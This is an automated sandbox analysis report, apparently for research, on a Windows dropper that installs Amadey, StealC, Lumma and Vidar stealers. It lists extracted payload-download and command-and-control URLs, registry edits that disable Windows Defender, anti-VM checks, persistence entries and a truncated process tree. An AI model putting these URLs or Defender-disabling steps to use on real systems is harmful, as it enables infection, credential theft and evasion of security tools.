Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
11-02-2025 11:47
Static task
static1
Behavioral task
behavioral1
Sample
4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe
Resource
win10v2004-20250207-en
General
-
Target
4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe
-
Size
5.5MB
-
MD5
77a3c3d5bb1cfed2fe0f671b47587fea
-
SHA1
5ffa631bc6c8039728bc242cb4b53f2537989c9a
-
SHA256
4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070
-
SHA512
2997dfe2b26208475847c03a174cc9d4e4739f82622c0120699558d7379fa567e5ba3f2d1e15c8b6132603aa945dc672c82dd627ece7d787a27975e901f89b42
-
SSDEEP
98304:GPehuq4AturODM/4vpB5ziJ37OtmaQoZQva22GyASk6BZwEXzktR23/jqMhMGt:GPeh3mw7HziJLyZ2NTBCfwEXz2R23/jD
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://timnelessdesign.cyou/api
https://paleboreei.biz/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/3236-441-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2948-207-0x0000000000F60000-0x00000000013A4000-memory.dmp healer behavioral1/memory/2948-208-0x0000000000F60000-0x00000000013A4000-memory.dmp healer behavioral1/memory/2948-243-0x0000000000F60000-0x00000000013A4000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE -
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Bjkm5hE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2l1630.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ IGR1OJ915UF3M9FHB51EY026C3LI.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1E00D7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3G42h.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 33 IoCs
flow pid Process 27 824 powershell.exe 36 848 powershell.exe 90 2464 powershell.exe 93 2464 powershell.exe 96 2464 powershell.exe 98 2464 powershell.exe 101 2464 powershell.exe 105 2464 powershell.exe 109 2464 powershell.exe 111 2464 powershell.exe 112 2464 powershell.exe 113 2464 powershell.exe 114 2464 powershell.exe 115 2464 powershell.exe 116 2464 powershell.exe 117 2464 powershell.exe 118 2464 powershell.exe 119 2464 powershell.exe 132 2464 powershell.exe 133 2464 powershell.exe 135 2464 powershell.exe 136 2464 powershell.exe 137 2464 powershell.exe 138 2464 powershell.exe 143 2464 powershell.exe 144 2464 powershell.exe 148 2464 powershell.exe 152 2464 powershell.exe 154 2464 powershell.exe 160 2464 powershell.exe 176 2464 powershell.exe 202 2464 powershell.exe 204 2464 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
pid Process 824 powershell.exe 848 powershell.exe 1796 powershell.exe 3384 powershell.exe 2988 powershell.exe 400 powershell.exe 1700 powershell.exe 4368 powershell.exe 676 powershell.exe -
Downloads MZ/PE file 11 IoCs
flow pid Process 29 1644 Process not Found 31 4648 skotes.exe 31 4648 skotes.exe 31 4648 skotes.exe 51 1648 2l1630.exe 88 4648 skotes.exe 88 4648 skotes.exe 27 824 powershell.exe 36 848 powershell.exe 106 2132 7933a0043c.exe 17 4648 skotes.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3816 chrome.exe 744 chrome.exe 4724 chrome.exe 5004 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x0009000000023e69-173.dat net_reactor behavioral1/memory/2344-187-0x00000000005A0000-0x000000000065E000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2l1630.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IGR1OJ915UF3M9FHB51EY026C3LI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3G42h.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Bjkm5hE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3G42h.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1E00D7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1E00D7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2l1630.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IGR1OJ915UF3M9FHB51EY026C3LI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Bjkm5hE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation 1E00D7.exe Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 20 IoCs
pid Process 5044 T0B39.exe 4364 1E00D7.exe 4648 skotes.exe 1648 2l1630.exe 4520 801cdea59f.exe 3644 bb18e0ec2c.exe 5116 bb18e0ec2c.exe 2856 skotes.exe 2344 0817201e9c.exe 1800 0817201e9c.exe 2948 Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE 2132 7933a0043c.exe 3884 483d2fa8a0d53818306efeb32d3.exe 1564 IGR1OJ915UF3M9FHB51EY026C3LI.exe 4448 skotes.exe 3236 Bjkm5hE.exe 4924 WveK4j1.exe 2036 NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe 2856 3G42h.exe 2444 skotes.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine IGR1OJ915UF3M9FHB51EY026C3LI.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine Bjkm5hE.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 2l1630.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 3G42h.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 1E00D7.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine skotes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" T0B39.exe Set value (str) \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\801cdea59f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1075142001\\801cdea59f.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1075143021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023e56-43.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 4364 1E00D7.exe 4648 skotes.exe 1648 2l1630.exe 2856 skotes.exe 2948 Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE 3884 483d2fa8a0d53818306efeb32d3.exe 1564 IGR1OJ915UF3M9FHB51EY026C3LI.exe 4448 skotes.exe 3236 Bjkm5hE.exe 2036 NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe 2856 3G42h.exe 2444 skotes.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3644 set thread context of 5116 3644 bb18e0ec2c.exe 112 PID 2344 set thread context of 1800 2344 0817201e9c.exe 126 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1E00D7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4124 3644 WerFault.exe 111 3644 2344 WerFault.exe 125 -
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1E00D7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 801cdea59f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bb18e0ec2c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7933a0043c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3G42h.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0817201e9c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IGR1OJ915UF3M9FHB51EY026C3LI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language T0B39.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bb18e0ec2c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2l1630.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0817201e9c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2956 MicrosoftEdgeUpdate.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Bjkm5hE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Bjkm5hE.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3560 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133837482062841751" chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 844 schtasks.exe 3424 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4364 1E00D7.exe 4364 1E00D7.exe 4648 skotes.exe 4648 skotes.exe 1648 2l1630.exe 1648 2l1630.exe 1648 2l1630.exe 1648 2l1630.exe 1648 2l1630.exe 1648 2l1630.exe 824 powershell.exe 824 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 4368 powershell.exe 4368 powershell.exe 4368 powershell.exe 676 powershell.exe 676 powershell.exe 676 powershell.exe 2856 skotes.exe 2856 skotes.exe 848 powershell.exe 848 powershell.exe 848 powershell.exe 2948 Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE 2948 Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE 2948 Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE 2948 Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE 2948 Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE 3884 483d2fa8a0d53818306efeb32d3.exe 3884 483d2fa8a0d53818306efeb32d3.exe 5116 bb18e0ec2c.exe 5116 bb18e0ec2c.exe 5116 bb18e0ec2c.exe 5116 bb18e0ec2c.exe 1800 0817201e9c.exe 1800 0817201e9c.exe 1800 0817201e9c.exe 1800 0817201e9c.exe 1564 IGR1OJ915UF3M9FHB51EY026C3LI.exe 1564 IGR1OJ915UF3M9FHB51EY026C3LI.exe 2132 7933a0043c.exe 2132 7933a0043c.exe 2132 7933a0043c.exe 2132 7933a0043c.exe 4448 skotes.exe 4448 skotes.exe 400 powershell.exe 400 powershell.exe 2464 powershell.exe 2464 powershell.exe 1796 powershell.exe 1796 powershell.exe 3236 Bjkm5hE.exe 3236 Bjkm5hE.exe 2036 NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe 2036 NC2E7H8VOLSLIOIB7YY8BGE7QSLF9E5.exe 2856 3G42h.exe 2856 3G42h.exe 3236 Bjkm5hE.exe 3236 Bjkm5hE.exe 2444 skotes.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 824 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeDebugPrivilege 676 powershell.exe Token: SeDebugPrivilege 848 powershell.exe Token: SeDebugPrivilege 2948 Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE Token: SeDebugPrivilege 400 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeShutdownPrivilege 3816 chrome.exe Token: SeCreatePagefilePrivilege 3816 chrome.exe Token: SeDebugPrivilege 2988 powershell.exe Token: SeShutdownPrivilege 3816 chrome.exe Token: SeCreatePagefilePrivilege 3816 chrome.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeShutdownPrivilege 3816 chrome.exe Token: SeCreatePagefilePrivilege 3816 chrome.exe Token: SeShutdownPrivilege 3816 chrome.exe Token: SeCreatePagefilePrivilege 3816 chrome.exe Token: SeShutdownPrivilege 3816 chrome.exe Token: SeCreatePagefilePrivilege 3816 chrome.exe Token: SeShutdownPrivilege 3816 chrome.exe Token: SeCreatePagefilePrivilege 3816 chrome.exe Token: SeShutdownPrivilege 3816 chrome.exe Token: SeCreatePagefilePrivilege 3816 chrome.exe -
Suspicious use of FindShellTrayWindow 30 IoCs
pid Process 4364 1E00D7.exe 4520 801cdea59f.exe 4520 801cdea59f.exe 4520 801cdea59f.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe 3816 chrome.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4520 801cdea59f.exe 4520 801cdea59f.exe 4520 801cdea59f.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1632 wrote to memory of 5044 1632 4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe 87 PID 1632 wrote to memory of 5044 1632 4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe 87 PID 1632 wrote to memory of 5044 1632 4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe 87 PID 5044 wrote to memory of 4364 5044 T0B39.exe 89 PID 5044 wrote to memory of 4364 5044 T0B39.exe 89 PID 5044 wrote to memory of 4364 5044 T0B39.exe 89 PID 4364 wrote to memory of 4648 4364 1E00D7.exe 91 PID 4364 wrote to memory of 4648 4364 1E00D7.exe 91 PID 4364 wrote to memory of 4648 4364 1E00D7.exe 91 PID 5044 wrote to memory of 1648 5044 T0B39.exe 92 PID 5044 wrote to memory of 1648 5044 T0B39.exe 92 PID 5044 wrote to memory of 1648 5044 T0B39.exe 92 PID 4648 wrote to memory of 4520 4648 skotes.exe 96 PID 4648 wrote to memory of 4520 4648 skotes.exe 96 PID 4648 wrote to memory of 4520 4648 skotes.exe 96 PID 4520 wrote to memory of 2008 4520 801cdea59f.exe 98 PID 4520 wrote to memory of 2008 4520 801cdea59f.exe 98 PID 4520 wrote to memory of 2008 4520 801cdea59f.exe 98 PID 4520 wrote to memory of 3728 4520 801cdea59f.exe 99 PID 4520 wrote to memory of 3728 4520 801cdea59f.exe 99 PID 4520 wrote to memory of 3728 4520 801cdea59f.exe 99 PID 2008 wrote to memory of 844 2008 cmd.exe 101 PID 2008 wrote to memory of 844 2008 cmd.exe 101 PID 2008 wrote to memory of 844 2008 cmd.exe 101 PID 3728 wrote to memory of 824 3728 mshta.exe 102 PID 3728 wrote to memory of 824 3728 mshta.exe 102 PID 3728 wrote to memory of 824 3728 mshta.exe 102 PID 4648 wrote to memory of 4448 4648 skotes.exe 104 PID 4648 wrote to memory of 4448 4648 skotes.exe 104 PID 4648 wrote to memory of 4448 4648 skotes.exe 104 PID 4448 wrote to memory of 3500 4448 cmd.exe 106 PID 4448 wrote to memory of 3500 4448 cmd.exe 106 PID 4448 wrote to memory of 3500 4448 cmd.exe 106 PID 3500 wrote to memory of 3560 3500 cmd.exe 108 PID 3500 wrote to memory of 3560 3500 cmd.exe 108 PID 3500 wrote to memory of 3560 3500 cmd.exe 108 PID 3500 wrote to memory of 4484 3500 cmd.exe 109 